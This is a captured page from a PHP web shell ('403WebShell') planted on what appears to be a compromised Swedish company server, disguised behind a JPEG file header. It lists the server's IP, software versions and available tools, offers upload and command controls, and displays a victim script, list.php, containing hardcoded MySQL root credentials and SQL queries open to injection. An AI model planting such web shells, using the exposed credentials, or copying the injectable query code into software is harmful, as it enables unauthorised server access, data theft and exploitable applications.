????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.191.86.218
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/icad.astacus.se/archive/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/icad.astacus.se/archive/list.php
<?php
session_start();

$CompanyId = $_SESSION['ASTACUS_SSO_INFO'][4];
$CustomerId = $CompanyId ;
$link = mysql_connect ("localhost", "root", "root123");
mysql_select_db ("vpa");

$sql = "SELECT * 
FROM ICADARCHIVEGroups, ICADARCHIVEParameters
WHERE ICADARCHIVEGroups.GroupId = ICADARCHIVEParameters.ParameterGroupId
AND ICADARCHIVEGroups.CompanyId = $CustomerId order by ICADARCHIVEParameters.ParameterId ";


$result = mysql_query($sql);
$Parameters = "";
$nbrpar = 0;
while ($row = mysql_fetch_assoc($result)){ 
 $Parameters .= $row['ParameterName']."\t";
 $nbrpar++;
}

$Topics = "IGNORE\t".$Parameters."IGNORE\tIGNORE\n";


$html = $Topics;


				
				
			
			//$sql = "SELECT * FROM ICADARCHIVEParameters, ICADARCHIVEParameterData,ICADARCHIVEGroups WHERE ICADARCHIVEParameters.ParameterId = ICADARCHIVEParameterData.ParameterId and ICADARCHIVEParameters.ParameterGroupId = ICADARCHIVEGroups.GroupId and CompanyId = ".$CustomerId." and not FilePath like '%icad_viewer_files%' group by FileHash order by FilePath";
			
			
			$sql = "SELECT * FROM ICADARCHIVEParameters, ICADARCHIVEParameterData,ICADARCHIVEGroups WHERE  ICADARCHIVEParameters.ParameterGroupId = ICADARCHIVEGroups.GroupId and ICADARCHIVEParameterData.FilePath Like '%/var/www/icad_files/$CustomerId%' and not FilePath like '%icad_viewer_files%' group by FileHash order by FilePath";
		
			$result = mysql_query($sql);
			while ($row = mysql_fetch_assoc($result)){ 
				 $FileHash = $row['FileHash'];
				 $sql = "SELECT * FROM ICADARCHIVEParameterData WHERE FileHash = '$FileHash' order by ParameterId";
			 	 $result2 = mysql_query($sql);
				 $html .= $row['FileHash']."\t";
				 $nbrpar_2 = 0;
				 while ($row2 = mysql_fetch_assoc($result2)){ 
				 	
					if(strpos($row2['Value'],':')){
						$html .=  " ".$row2['Value']."\t";
					}else{
						$html .=  $row2['Value']."\t";
					}
					$nbrpar_2++;
					
					
				 }
				 
				 for($t = 0; $t < ($nbrpar - $nbrpar_2);$t++){
					 $html .= "\t";
				 }
				 
				 
				 $html .= $row['Filename']."\t";
				 $html .= $row['FilePath']."\n";
			}
						
			
			
			
//

header('Content-type: application/ms-excel');
header('Content-Disposition: attachment; filename='.$CustomerId.'_Parameters.xls');

echo($html);

?>

Youez - 2016 - github.com/yon3zu
LinuXploit